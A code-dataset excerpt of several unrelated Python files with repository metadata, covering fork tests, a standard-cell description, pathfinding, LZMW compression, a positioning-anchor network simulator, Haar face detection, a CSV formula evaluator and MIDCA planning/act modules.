assert 1 == c_ssl.RAND_pseudo_bytes(buf, n)
return buf[:]
def exercise_importer(n):
"""
Ensure the forked child has a sensible importer.
"""
sys.path.remove(testlib.DATA_DIR)
import simple_pkg.a
return simple_pkg.a.subtract_one_add_two(n)
class ForkTest(testlib.RouterMixin, unittest2.TestCase):
def test_okay(self):
context = self.router.fork()
self.assertNotEqual(context.call(os.getpid), os.getpid())
self.assertEqual(context.call(os.getppid), os.getpid())
def test_random_module_diverges(self):
context = self.router.fork()
self.assertNotEqual(context.call(random_random), random_random())
def test_ssl_module_diverges(self):
# Ensure generator state is initialized.
RAND_pseudo_bytes()
context = self.router.fork()
self.assertNotEqual(context.call(RAND_pseudo_bytes),
RAND_pseudo_bytes())
def test_importer(self):
context = self.router.fork()
self.assertEqual(2, context.call(exercise_importer, 1))
def test_on_start(self):
recv = mitogen.core.Receiver(self.router)
def on_start(econtext):
sender = mitogen.core.Sender(econtext.parent, recv.handle)
sender.send(123)
context = self.router.fork(on_start=on_start)
self.assertEquals(123, recv.get().unpickle())
class DoubleChildTest(testlib.RouterMixin, unittest2.TestCase):
def test_okay(self):
# When forking from the master process, Mitogen had nothing to do with
# setting up stdio -- that was inherited wherever the Master is running
# (supervisor, iTerm, etc). When forking from a Mitogen child context
# however, Mitogen owns all of fd 0, 1, and 2, and during the fork
# procedure, it deletes all of these descriptors. That leaves the
# process in a weird state that must be handled by some combination of
# fork.py and ExternalContext.main().
# Below we simply test whether ExternalContext.main() managed to boot
# successfully. In future, we need lots more tests.
c1 = self.router.fork()
c2 = self.router.fork(via=c1)
self.assertEquals(123, c2.call(ping))
def test_importer(self):
c1 = self.router.fork(name='c1')
c2 = self.router.fork(name='c2', via=c1)
self.assertEqual(2, c2.call(exercise_importer, 1))
if __name__ == '__main__':
unittest2.main()
|
[
"dw@botanicus.net"
] |
dw@botanicus.net
|
b001592fbd0025106b5c0de3a8e0852a6fb0006e
|
226b1c73a706f4734834196d18305d4d2c873589
|
/synlib/descriptions/EDFFXL.py
|
206bab5d4710ad637b02fca8e34e937d415a73fb
|
[] |
no_license
|
ocakgun/vlsistuff
|
43b4b07ae186b8d2360d11c57cd10b861e96bcbe
|
776c07f5d0c40fe7d410b5c85e7381017d4dab64
|
refs/heads/master
| 2022-06-13T14:40:22.641310
| 2020-05-08T11:09:00
| 2020-05-08T11:09:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
Desc = cellDescClass("EDFFXL")
Desc.properties["cell_leakage_power"] = "1762.140420"
Desc.properties["cell_footprint"] = "edff"
Desc.properties["area"] = "76.507200"
Desc.pinOrder = ['CK', 'D', 'E', 'IQ', 'IQN', 'Q', 'QN', 'next']
Desc.add_arc("CK","D","setup_rising")
Desc.add_arc("CK","D","hold_rising")
Desc.add_arc("CK","E","setup_rising")
Desc.add_arc("CK","E","hold_rising")
Desc.add_arc("CK","Q","rising_edge")
Desc.add_arc("CK","QN","rising_edge")
Desc.add_param("area",76.507200);
Desc.set_pin_job("CK","clock")
Desc.add_pin("CK","input")
Desc.add_pin("E","input")
Desc.add_pin("D","input")
Desc.add_pin("IQ","output")
Desc.add_pin_func("IQ","unknown")
Desc.add_pin("next","output")
Desc.add_pin_func("next","unknown")
Desc.add_pin("Q","output")
Desc.add_pin_func("Q","unknown")
Desc.add_pin("IQN","output")
Desc.add_pin_func("IQN","unknown")
Desc.add_pin("QN","output")
Desc.add_pin_func("QN","unknown")
Desc.set_job("flipflop")
CellLib["EDFFXL"]=Desc
|
[
"greenblat@mac.com"
] |
greenblat@mac.com
|
37913d32b1f43d61aebe7d69c85c3aed7ea2fbc1
|
baea358f397970314b60b2e3420e9925c241b335
|
/hlt/a_star.py
|
c1d33dba5dd5801078f9069a3c7e90f5913558c5
|
[] |
no_license
|
adozendonuts/hb1
|
2ea366941f3e4f3f5434eeca9da3583ec7ad23a7
|
fbaf95b98e832ff75ed97f80596b7b5f135a53bd
|
refs/heads/master
| 2021-07-22T00:00:28.037915
| 2017-11-01T07:15:23
| 2017-11-01T07:15:23
| 109,086,987
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,780
|
py
|
"""
A* Pathfinding on an exhaustive rectangular grid
TODO: change map representation to planets + in-between points for long distances, 20 unit radius for each ship
"""
import collections
import heapq
class Queue:
"""
A data structure used by the algorithm to determine which order to process the locations
"""
def __init__(self):
self.elements = collections.deque()
def empty(self):
return len(self.elements) == 0
def put(self, x):
self.elements.append(x)
def get(self):
return self.elements.popleft()
class SimpleGraph:
"""
A data structure that identifies the neighbors for each location
"""
def __init__(self):
self.edges = {}
def neighbors(self, id):
return self.edges[id]
class SquareGrid:
"""
A data structure that defines a square (rectangular) grid as a series of locations
"""
def __init__(self, width, height):
self.width = width
self.height = height
self.walls = []
def in_bounds(self, id):
(x, y) = id
return 0 <= x < self.width and 0 <= y < self.height
def passable(self, id):
return id not in self.walls
    def neighbors(self, id):
(x, y) = id
results = [(x + 1, y), (x, y - 1), (x - 1, y), (x, y + 1)]
if (x + y) % 2 == 0: results.reverse() # aesthetics
results = filter(self.in_bounds, results)
results = filter(self.passable, results)
return results
class GridWithWeights(SquareGrid):
def __init__(self, width, height):
super().__init__(width, height)
self.weights = {}
def cost(self, from_node, to_node):
return self.weights.get(to_node, 1)
class PriorityQueue:
    def __init__(self):
self.elements = []
def empty(self):
return len(self.elements) == 0
def put(self, item, priority):
heapq.heappush(self.elements, (priority, item))
def get(self):
        return heapq.heappop(self.elements)[1]
# TODO start implementation at 1.3.3 SEARCH
example_graph = SimpleGraph()
example_graph.edges = {
    'A': ['B'],
    'B': ['A', 'C', 'D'],
    'C': ['A'],
    'D': ['E', 'A'],
    'E': ['B'],
}
g = SquareGrid(30, 15)
g.walls = []  # the original source left this assignment blank; no walls for now
def breadth_first_search_1(graph, start):
# print out what we find
frontier = Queue()
frontier.put(start)
came_from = {}
came_from[start] = None
while not frontier.empty():
current = frontier.get()
        # this first version simply explores the whole graph (no early exit)
for next in graph.neighbors(current):
if next not in came_from:
frontier.put(next)
                came_from[next] = current
return came_from
breadth_first_search_1(example_graph, "A")
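# Quick sanity check (illustrative, not from the original tutorial): a corner
# cell of the 30x15 grid defined above has exactly two in-bounds neighbours
# when no walls are set.
print(list(g.neighbors((0, 0))))  # -> [(0, 1), (1, 0)]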
|
[
"isoybean@gmail.com"
] |
isoybean@gmail.com
|
098d337ffef7cf815b953a5de956a51ed097c7e9
|
00f5c993537b49e415db9e0010679fc56b3d9239
|
/LZMW.py
|
177a3064fe6671bcfd7c7fa1ef7987ecffcc379c
|
[] |
no_license
|
rgkaw/LZW-LZMW-and-LZAP
|
e0980d4d540fe6c40c658f77b74ed31caa603f5e
|
ea0caafacdc529fa36d4c33d19ef2f20182224a8
|
refs/heads/main
| 2023-06-02T06:09:47.458065
| 2021-06-22T17:26:13
| 2021-06-22T17:26:13
| 378,699,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,117
|
py
|
def encode(array):
last=256
i=0
array_len=len(array)
prev_match=b''
match=b''
out=[]
while(i<array_len):
match=bytes([array[i]])
while(match in dictionary):
i=i+1
try:
match=match+bytes([array[i]])
except:
match=match+bytes([array[i-1]])
break
match=match[:-1]
out.append(dictionary[match])
if(prev_match+match) not in dictionary:
x=match
dictionary[prev_match+match]=last
last+=1
prev_match=match
return out
def output_to_bytes(array):
i=0
bits=0
bit_chunks=0
#max length in decimal
mldec=max(array)
#max length in binary
mlbin=1
x=mldec
out=[]
while x>1:
x=x>>1
mlbin+=1
out.append(mlbin)
while i<len(array):
while bits<=mlbin:
j=array[i]
i=i+1
x=j
bit_chunks=(bit_chunks<<mlbin)|j
bits=bits+mlbin
if i>=len(array):
break
while bits>=8:
bits=bits-8
temp=bit_chunks>>(bits)
out.append(temp)
bit_chunks=bit_chunks&((2**(bits))-1)
if i>=len(array):
if(bits!=0):
padding=8-bits
bit_chunks=(bit_chunks<<(padding))|((2**padding)-1)
out.append(bit_chunks)
out.append(padding)
else:
out.append(0)
return bytes(out)
from time import sleep
def get_string(idx):
a=b''
for i in dictionary:
if dictionary[i]==idx:
a=i
return a
def decode(array):
out=b''
match=b''
prev_match=b''
last=256
try:
for i in array:
match=get_string(i)
out=out+match
x=b''
x=(prev_match)+match
if x not in dictionary:
dictionary[x]=last
last+=1
prev_match=match
except:
out=out+(get_string(i))
return out
def bytes_to_int(array):
out=[]
byte_chunk=0
bits=0
length=array[0]
padding=array[-1]
array=array[1:-1]
size=len(array)
i=0
while i<size-1:
while (bits<length) & (i<size-1):
#print(array[i])
#sleep(1)
#print(type(byte_chunk))
byte_chunk=(byte_chunk<<8)+array[i]
bits=bits+8
i+=1
# print('1',byte_chunk,bits)
while bits>=length:
bits=bits-length
temp=byte_chunk>>(bits)
out.append(temp)
byte_chunk=byte_chunk&((2**bits)-1)
byte_chunk=(byte_chunk<<8)+array[i]
byte_chunk=byte_chunk>>padding
out.append(byte_chunk)
return out
def compress():
print('You choose to compress file. Place file to compress in the same directory as this program.')
input_file=str(input("Input file (ex :file.txt): "))
f=open(file=input_file,mode='r+b')
input_=f.read()
file_name=''
for i in input_file:
if i == '.':
break
file_name=file_name+i
print("making dictionary...")
#make dictionary
dictionary={bytes([i]):i for i in range(256)}
print("\tinput size\t: ",len(input_),'bytes')
print("compressing...")
output=encode(input_)
print("converting to bytes...")
#convert output list into bytes
output=output_to_bytes(output)
print("saving file....")
print("\toutput size:\t",len(output),"bytes")
#WRITE FILE OUTPUT
f=open(file=file_name+'.LZMW',mode='w+b')
f.write(output)
f.close()
print("done!!")
def decompress():
print('You choose to decompress file. Place file to decompress in the same directory as this program.')
input_file=input(str("Input file (ex :file.LZMW): "))
file_name=''
for i in input_file:
if i == '.':
break
file_name=file_name+i
f=open(file=input_file,mode='r+b')
input_=f.read()
print("\tfile size: ",len(input_),'bytes')
print("preparing files...")
input_=bytes_to_int(input_)
print("creating dictionary...")
dictionary={bytes([i]):i for i in range(256)}
print("decompressing...")
output=decode(input_)
print("done!")
print("\toutput size:\t",len(output),'\n')
f=open(file=file_name+'_LZMW.txt',mode='w+b')
f.write(output)
f.close()
while True:
dictionary={bytes([i]):i for i in range(256)}
try:
choice=int(input("1. compress\n2. decompress\n0. exit\n\tyour choice:"))
try:
if choice==1:
compress()
elif choice==2:
decompress()
elif choice==0:
break
else:
print("invalid input")
except:
print('cannot find file...')
except:
print("invalid input (not integer)")
|
[
"noreply@github.com"
] |
noreply@github.com
|
aed20090029a8657ee670be14f222021220a3fbf
|
1bdfc75a73cf424154e1eeeca2d77ada1548197c
|
/xinxi2.py
|
a3e54ba697bf74173f4ec34237963edf27c07077
|
[] |
no_license
|
15921970316/test_chor_new
|
6320d74ab92c3d8d8801c8086ff8b91b1fb85c12
|
8eba96786d5885027c979aa89a356d25a2a0a822
|
refs/heads/main
| 2023-01-19T23:32:14.586241
| 2020-11-26T02:44:56
| 2020-11-26T02:44:56
| 316,100,256
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,026
|
py
|
import datetime
import socket
import cou
import unit
from api.sk2 import xintiao, zhuce, CCPTX_Report, CCPRX_Report, BLINK_Report
import threading
import time
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
Rx_seq=0
tts=0
Blink_seq=0
Blink_tts=0
filename = unit.BASE_DIR + "\data\Data.json"
anchor_cfg_list = unit.read_name_data2(filename, "anchor_cfg")
list = []
for i in anchor_cfg_list:
list.append(i)
# Classify and handle the messages returned by the engine
def Recv_info(ms):
# print('分类接收打印引擎返回信息', ms)
global bs
try:
if ms == b'':
...
elif ms == 0 or ms == None:
print("连接失败")
elif ms[0] == 0x21:
...
# print("基站心跳包2:",hex(ms[0]),ms)
elif ms[0] == 0x43:
print("配置基站2定位参数:",hex(ms[0]),hex(ms[1]),hex(ms[2]))
elif ms[0] == 0x44:
print("配置基站2射频参数:",hex(ms[0]))
elif ms[0] == 0x57:
cou.rtls = 1
print('2定位开始:', hex(ms[0]), ms[1])
if ms[1]==1:
bs=1
elif ms[1]==0:
bs=0
else:
bs=3
elif ms[0] == 0x45:
print("配置基站2天线延迟参数:",hex(ms[0]) )
else:
print(" 2其他参数:", hex(ms[0]))
# ms.hex().encode(encoding="utf-8"))
except Exception as e:
print('服务器连接失败--2', e)
# Tag (blink) info; no return value
def Blink_info():
    # read the tag address file
filename = unit.BASE_DIR + "\data\Data.json"
json1 = unit.read_name_data2(filename, "Tag_Addr_XYZ")
# json2 = unit.read_name_data(filename, "Blik_time")
# Blink_time=1/float(json2[0][0])
# print('2基站Blink发送频率为:{}HZ'.format(json2[0][0]))
X=-1
while True:
sep_c = Blink_seq
time1 = Blink_tts
if X != sep_c:
# time1 = cou.time2
try:
n = 0
for Tag_Addr in json1:
tt = time1+ cou.BINK(Tag_Addr[1][0], Tag_Addr[1][1], 2) - cou.BINK(
Tag_Addr[1][0], Tag_Addr[1][1], 1)
sk.send(BLINK_Report(sep_c, Tag_Addr[0], tt))
n += 1
# def anchor1():
# tt = cou.BINK(90, 90, 2) - cou.BINK(90, 90, 1)
# sk.send(BLINK_Report(sep_c, addr1, time1 + tt+1))
#
# def anchor2():
# tt = cou.BINK(50, 50, 2) - cou.BINK(50, 50, 1)
# sk.send(BLINK_Report(sep_c, addr2, time1 + tt+4))
#
# def anchor3():
# tt = cou.BINK(20, 20, 2) - cou.BINK(20, 20, 1)
# sk.send(BLINK_Report(sep_c, addr3, time1 + tt+12))
#
# t1 = threading.Thread(target=anchor1)
# t2 = threading.Thread(target=anchor2)
# t3 = threading.Thread(target=anchor3)
# t1.start()
# t2.start()
# t3.start()
X = sep_c
except Exception as e:
print('服务器连接失败--222', e)
# After TDOA positioning starts, every anchor sends time-sync packet reception reports to the positioning engine
def CCPRX_Report2():
Rxseq = -1
x=0
while True:
while True:
x=Rx_seq
if Rxseq!=x:
try:
t=tts+ cou.BINK(list[1][1][0], list[1][1][1], 0)
# print('CCPTX_Report2----', x, t)
sk.send(CCPRX_Report(x, t,list[0][0]))
cou.time2=t
# t = cou.time3 + int(0.15 * 499.2e6 * 128.0)
Rxseq = Rx_seq
break
except Exception as e:
print('CCPRX_Report2', e)
else:
...
# Timer
def time_x():
t = 0b0000000000000000000000000000001100000011
while True:
if t >= 1099511627775:
t = 0b0000000000000000000000000000000000000000
cou.time2=0
# report_name = os.path.dirname(os.path.abspath(__file__)) + "/report/test_info.html"
# time.sleep(0.1)
cou.time2=cou.time2+1
t+=1
# The heartbeat interval is 2 s: send a heartbeat every 2 s and expect a reply from the engine; if it times out, the connection is dropped immediately
def xintiao2():
i = 0
while True:
try:
sk.send(xintiao())
ms = sk.recv(1024)
Recv_info(ms)
i += 1
time.sleep(5)
except Exception as e:
print('服务器连接失败--2', e)
break
while True:
try:
filename = unit.BASE_DIR + "\data\Data.json"
json = unit.get_json_data(filename)
sk.connect((json["ip"],json['port']))
sk.send(zhuce(list[1][0]))
# print('次基站2注册信息包', zhuce())
ms = sk.recv(1024)
Recv_info(ms)
        ## thread setup section
t1 = threading.Thread(target=xintiao2)
t2 = threading.Thread(target=Blink_info)
t3 = threading.Thread(target=CCPRX_Report2)
# t4 = threading.Thread(target=time_x)
t1.start()
# t4.start()
while True:
if cou.rtls==1:
t3.start()
t2.start()
break
break
except Exception as e:
print('服务器连接失败--', e)
        ## thread join section
        # t1.join()  # join blocks the current thread (here the main thread); the main thread would only finish after Thread-1 ends
# t2.join()
|
[
"noreply@github.com"
] |
noreply@github.com
|
0168ac897bdf4a2f1b3a7c34a176bb31fecce4a7
|
cee42277672cbcc3a354b7feb604ce5ff9ae05eb
|
/face_recognition_windows/src/face_detected_haar.py
|
821fd7c47790fe94965979392f7a3e1604f7936d
|
[] |
no_license
|
linhhonblade/face_recognition_project
|
2ef9aa93475403c1b2dba1e4ae2347fc95c9a6a9
|
59f235a3f29d8a01599f20569e0eb7ebf0a63fd4
|
refs/heads/master
| 2020-04-08T01:59:26.584120
| 2018-11-21T14:37:08
| 2018-11-21T14:37:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,071
|
py
|
import cv2
#push image to memory for processing
def ImagePush():
path=input('link of image: ')
if path=="":
path='../../image/face_2.jpg'
img=cv2.imread(path,0)
return img
#show image
def ImageShow(img):
    cv2.imshow('image',img)
    k=cv2.waitKey()
    while k!=ord('q'):
        k=cv2.waitKey()
#import module face using haar
def ImageDetect(img,mode=0):
if mode==0:
Module=input('link trained module: ')
else:
Module=''
if Module=='':
Module='../../haarcascades/haarcascade_frontalface_default.xml'
face_haar=cv2.CascadeClassifier(Module)
face=face_haar.detectMultiScale(img,1.1,5)
#print("Number of face is: ",len(face))
#print("local of point is: ",face)
if not mode==0:
return face
#add text to image
def face_draw_text(img,matrix,text):
(x,y,w,h)=matrix[0]
cv2.putText(img,text,(x,y),cv2.FONT_HERSHEY_PLAIN,1.5,(0, 255, 0), 2)
#add rectangle to image
def face_draw_rectangle(img,face):
for(x,y,w,h) in face:
cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)
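# Illustrative usage sketch (not in the original file). 'sample.jpg' is a
# placeholder path, and the default Haar cascade path above is assumed to exist.
if __name__ == '__main__':
    image = cv2.imread('sample.jpg', 0)
    faces = ImageDetect(image, mode=1)   # mode != 0 uses the default cascade and returns detections
    face_draw_rectangle(image, faces)
    ImageShow(image)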
|
[
"lenhuchuhiep99@gmail.com"
] |
lenhuchuhiep99@gmail.com
|
16df41a61ad44e7d25d5d072c4382cdc29cedec8
|
0f932e961983e310cf6c12608d55cfc526be55ad
|
/hw1.py
|
7b0de8e27706ce210cdfb6657974f387b15e604a
|
[] |
no_license
|
alexandrov-nikita/homework1_hse
|
00a65e738571858b1bd91065bba028138183dc21
|
e33365f987fdc21bd607572d8e46bce4bfcb7b77
|
refs/heads/master
| 2021-01-19T19:26:43.052243
| 2016-02-29T09:01:19
| 2016-02-29T09:01:19
| 52,109,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
import csv
import sys
import math
import imp
import os
def read_data(file_name):
return list(csv.reader(open(file_name, 'rt')))
def create_dictionary(data, output):
dict = {}
for index_row, row in enumerate(data):
for index_column, cell in enumerate(row):
if cell[0] != '=':
dict[chr(ord('A') + index_column) + str(index_row + 1)] = cell
return dict
def change_for_func(commands_list, module_name, cell):
new_cell = cell
for command in commands_list:
new_cell = new_cell.replace(command + '(', module_name + command + '(')
return new_cell
def calculate(dict, output):
for index_row, row in enumerate(data):
for index_column, cell in enumerate(row):
if cell[0] == '=':
cell = change_for_func(math_commands, 'math.', cell)
cell = change_for_func(module_commands, "module.", cell)
cell = cell[1:]
for known_cell, item in dict.items():
if item.isdigit() or item.replace('.', '' ,1).isdigit():
cell = cell.replace(known_cell, item)
else:
cell = cell.replace(known_cell, '\"' + item + '\"')
try:
output[index_row][index_column] = eval(cell)
except Exception as exc:
output[index_row][index_column] = "ERROR"
def write_data(output_name, output_table):
c = csv.writer(open(output_name, "w"))
for row in output_table:
c.writerow(row)
def module_preparation():
module_commands = []
for command in dir(module):
if command[0] != '_':
module_commands.append(command)
return module_commands
data = read_data(sys.argv[1])
if (len(sys.argv) > 3):
module_name = sys.argv[3]
module = imp.load_source(module_name, os.getcwd() + '/' + module_name)
module_commands = module_preparation()
else:
module_commands = []
output = data
dict = create_dictionary(data, output)
math_commands = dir(math)
calculate(dict, output)
write_data(sys.argv[2], output)
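# Illustrative usage (hypothetical file names, not part of the original script):
#   python hw1.py input.csv output.csv
# With input.csv containing the single row
#   1,2,=A1+B1
# the formula cell is evaluated after substituting A1 -> 1 and B1 -> 2,
# so output.csv ends up holding 1,2,3.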
|
[
"alexandrov-nikita@yandex.ru"
] |
alexandrov-nikita@yandex.ru
|
9024d6d29a05f047350bb653f30fa1105ce5e289
|
8ded9e9a614064489e999316fc79f517e0c1bc1b
|
/midca/modules/act.py
|
ffd81a660e2cdf427234cdbddf3511e5ee5ca96b
|
[] |
no_license
|
COLAB2/GraceMIDCA
|
32553b958c46d8a1ee043d1ff5c1d6fb908cc942
|
43925081dfb19088fb3454c36a5286789fe9c140
|
refs/heads/master
| 2020-07-07T03:20:37.468101
| 2020-03-30T23:37:02
| 2020-03-30T23:37:02
| 203,229,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,720
|
py
|
from midca.modules._plan.asynch import asynch
from midca import base
import copy
class AsynchronousAct(base.BaseModule):
'''
MIDCA module that "executes" plans in which the individual actions will be conducted
asynchronously. This was originally designed to allow MIDCA to work as a robot
controller in communication with ROS sensor and effector nodes.
'''
def run(self, cycle, verbose = 2):
self.verbose = verbose
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)[-1]
except:
goals = []
if not goals:
if verbose >= 2:
print "No Active goals. Act phase will do nothing"
return
try:
plan = self.mem.get(self.mem.GOAL_GRAPH).getMatchingPlan(goals)
except:
if verbose >= 1:
print "Error loading plan. Skipping act phase."
return
if not plan:
if verbose > 2:
print "No current plan. Skipping Act phase"
return
i = 0
if plan.finished():
print "Plan", plan, "has already been completed"
return
# ideally MIDCA should check for other valid plans, but for now it doesn't.
while i < len(plan):
action = plan[i]
try:
if action.status != asynch.FAILED and action.status != asynch.COMPLETE:
completed = action.check_complete()
if completed:
self.mem.add(self.mem.ACTIONS, [action.midcaAction])
if verbose >= 2:
print "Action", action, "completed"
except AttributeError:
if verbose >= 1:
print "Action", action, "Does not seem to have a valid check_complete() ",
"method. Therefore MIDCA cannot execute it."
action.status = asynch.FAILED
try:
if action.status == asynch.NOT_STARTED:
if verbose >= 2:
print "Beginning action execution for", action
action.execute()
except AttributeError:
if verbose >= 1:
print "Action", action, "Does not seem to have a valid execute() ",
"method. Therefore MIDCA cannot execute it"
action.status = asynch.FAILED
if action.status == asynch.COMPLETE:
i += 1
elif not action.blocks:
i += 1
else:
break
class SimpleAct(base.BaseModule):
'''
MIDCA module that selects the plan, if any, that achieves the most current goals, then selects the next action from that plan. The selected action is stored in a two-dimensional array in mem[mem.ACTIONS], where mem[mem.ACTIONS][x][y] returns the yth action to be taken at time step x. So mem[mem.ACTIONS][-1][0] is the last action selected. Note that this will throw an index error if no action was selected.
To have MIDCA perform multiple actions in one cycle, simple add several actions to mem[mem.ACTIONS][-1]. So mem[mem.ACTIONS][-1][0] is the first action taken, mem[mem.ACTIONS][-1][1] is the second, etc.
'''
#returns the plan that achieves the most current goals, based on simulation.
def get_best_plan(self, world, goals, verbose):
plan = None
goalsAchieved = set()
goalGraph = self.mem.get(self.mem.GOAL_GRAPH)
for nextPlan in goalGraph.allMatchingPlans(goals):
achieved = world.goals_achieved(nextPlan, goals)
if len(achieved) > len(goalsAchieved):
goalsAchieved = achieved
plan = nextPlan
if len(achieved) == len(goals):
break
elif verbose >= 2:
print "Retrieved plan does not achieve all goals. Trying to retrieve a different plan..."
if verbose >= 3:
print " Retrieved Plan:"
for a in nextPlan:
print " "+str(a)
print "Goals achieved:", [str(goal) for goal in achieved]
if plan == None and verbose >= 1:
print "No valid plan found that achieves any current goals."
elif len(goalsAchieved) < len(goals) and verbose >= 1:
print "Best plan does not achieve all goals."
if verbose >= 2:
print "Plan:", str(plan)
print "Goals achieved:", [str(goal) for goal in goalsAchieved]
return plan
def run(self, cycle, verbose = 2):
self.verbose = verbose
max_plan_print_size = 5
world = self.mem.get(self.mem.STATES)[-1]
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)[-1]
except :
goals = []
plan = self.get_best_plan(world, goals, verbose)
trace = self.mem.trace
if trace:
trace.add_module(cycle,self.__class__.__name__)
trace.add_data("WORLD", copy.deepcopy(world))
trace.add_data("GOALS", copy.deepcopy(goals))
trace.add_data("PLAN", copy.deepcopy(plan))
if plan != None:
action = plan.get_next_step()
if not action:
if verbose >= 1:
print "Plan to achieve goals has already been completed. Taking no action."
self.mem.add(self.mem.ACTIONS, [])
else:
if verbose == 1:
print "Action selected:", action
elif verbose >= 2:
if len(plan) > max_plan_print_size:
# print just the next 3 actions of the plan
print "Selected action", action, "from plan:\n"
if verbose >= 3:
for a in plan:
print " "+str(a)
else:
# print the whole plan
print "Selected action", action, "from plan:\n", plan
self.mem.add(self.mem.ACTIONS, [action])
actions = self.mem.get(self.mem.ACTIONS)
if len(actions) > 400:
actions = actions[200:] # trim off old stale actions
self.mem.set(self.mem.ACTIONS, actions)
#print "Trimmed off 200 old stale actions to save space"
plan.advance()
if trace: trace.add_data("ACTION", action)
else:
if verbose >= 1:
print "MIDCA will not select an action this cycle."
self.mem.add(self.mem.ACTIONS, [])
if goals:
for g in goals:
self.mem.get(self.mem.GOAL_GRAPH).remove(g)
if trace: trace.add_data("ACTION", None)
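# Illustrative note (not part of MIDCA): given the layout described in the
# SimpleAct docstring, the most recently selected action can be read back with
#   actions = self.mem.get(self.mem.ACTIONS)   # per-cycle lists of actions
#   last_action = actions[-1][0]               # IndexError if nothing was selected that cycle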
class SimpleAct_temporary(base.BaseModule):
'''
For both construction and restaurant domain
MIDCA module that selects the plan, if any, that achieves the most current goals, then selects the next action from that plan. The selected action is stored in a two-dimensional array in mem[mem.ACTIONS], where mem[mem.ACTIONS][x][y] returns the yth action to be taken at time step x. So mem[mem.ACTIONS][-1][0] is the last action selected. Note that this will throw an index error if no action was selected.
To have MIDCA perform multiple actions in one cycle, simple add several actions to mem[mem.ACTIONS][-1]. So mem[mem.ACTIONS][-1][0] is the first action taken, mem[mem.ACTIONS][-1][1] is the second, etc.
'''
# returns the plan that achieves the most current goals, based on simulation.
def get_best_plan(self, world, goals, verbose):
plan = None
goalsAchieved = set()
goalGraph = self.mem.get(self.mem.GOAL_GRAPH)
for nextPlan in goalGraph.allMatchingPlans(goals):
achieved = world.goals_achieved(nextPlan, goals)
if len(achieved) > len(goalsAchieved):
goalsAchieved = achieved
plan = nextPlan
if len(achieved) == len(goals):
break
elif verbose >= 2:
print "Retrieved plan does not achieve all goals. Trying to retrieve a different plan..."
if verbose >= 3:
print " Retrieved Plan:"
for a in nextPlan:
print " " + str(a)
print "Goals achieved:", [str(goal) for goal in achieved]
if plan == None and verbose >= 1:
print "No valid plan found that achieves any current goals."
elif len(goalsAchieved) < len(goals) and verbose >= 1:
print "Best plan does not achieve all goals."
if verbose >= 2:
print "Plan:", str(plan)
print "Goals achieved:", [str(goal) for goal in goalsAchieved]
return plan
def run(self, cycle, verbose=2):
self.verbose = verbose
max_plan_print_size = 5
world = self.mem.get(self.mem.STATES)[-1]
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)
except:
goals = []
plan = self.get_best_plan(world, goals, verbose)
trace = self.mem.trace
if trace:
trace.add_module(cycle, self.__class__.__name__)
trace.add_data("WORLD", copy.deepcopy(world))
trace.add_data("GOALS", copy.deepcopy(goals))
trace.add_data("PLAN", copy.deepcopy(plan))
if plan != None:
action = plan.get_next_step()
if not action:
if verbose >= 1:
print "Plan to achieve goals has already been completed. Taking no action."
self.mem.add(self.mem.ACTIONS, [])
else:
if verbose == 1:
print "Action selected:", action
elif verbose >= 2:
if len(plan) > max_plan_print_size:
# print just the next 3 actions of the plan
print "Selected action", action, "from plan:\n"
if verbose >= 3:
for a in plan:
print " " + str(a)
else:
# print the whole plan
print "Selected action", action, "from plan:\n", plan
self.mem.add(self.mem.ACTIONS, [action])
actions = self.mem.get(self.mem.ACTIONS)
if len(actions) > 400:
actions = actions[200:] # trim off old stale actions
self.mem.set(self.mem.ACTIONS, actions)
# print "Trimmed off 200 old stale actions to save space"
plan.advance()
if trace: trace.add_data("ACTION", action)
else:
if verbose >= 1:
print "MIDCA will not select an action this cycle."
self.mem.add(self.mem.ACTIONS, [])
if goals:
for g in goals:
self.mem.get(self.mem.GOAL_GRAPH).remove(g)
if trace: trace.add_data("ACTION", None)
class NBeaconsSimpleAct(base.BaseModule):
'''
MIDCA module that selects the plan, if any, that achieves the most current goals, then selects the next action from that plan. The selected action is stored in a two-dimensional array in mem[mem.ACTIONS], where mem[mem.ACTIONS][x][y] returns the yth action to be taken at time step x. So mem[mem.ACTIONS][-1][0] is the last action selected. Note that this will throw an index error if no action was selected.
To have MIDCA perform multiple actions in one cycle, simple add several actions to mem[mem.ACTIONS][-1]. So mem[mem.ACTIONS][-1][0] is the first action taken, mem[mem.ACTIONS][-1][1] is the second, etc.
'''
def get_first_plan(self, goals):
goalGraph = self.mem.get(self.mem.GOAL_GRAPH)
plans = goalGraph.allMatchingPlans(goals)
for p in plans:
if p.finished():
goalGraph.removePlan(p)
if self.verbose >= 1:
print "Just removed finished plan "
for ps in p:
print " "+str(ps)
else:
return p
if self.verbose >= 1: print "Could not find an unfinished plan in get_first_plan() for goals "+str(goals)
return None
def run(self, cycle, verbose = 2):
self.verbose = verbose
max_plan_print_size = 10
world = self.mem.get(self.mem.STATES)[-1]
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)[-1]
except:
goals = []
plan = self.get_first_plan(goals)
trace = self.mem.trace
if trace:
trace.add_module(cycle,self.__class__.__name__)
trace.add_data("WORLD", copy.deepcopy(world))
trace.add_data("GOALS", copy.deepcopy(goals))
trace.add_data("PLAN", copy.deepcopy(plan))
if plan != None:
action = plan.get_next_step()
if not action:
if verbose >= 1:
print "Plan to achieve goals has already been completed. Taking no action."
self.mem.add(self.mem.ACTIONS, [])
else:
if verbose == 1:
print "Action selected:", action
elif verbose >= 2:
if len(plan) > max_plan_print_size:
# print just the next 3 actions of the plan
print "Selected action", action, "from plan:\n"
if verbose >= 3:
for a in plan:
if action == a:
print " *"+str(a)
else:
print " "+str(a)
else:
# print the whole plan
print "Selected action", action, "from plan:\n"
for a in plan:
if action == a:
print " *"+str(a)
else:
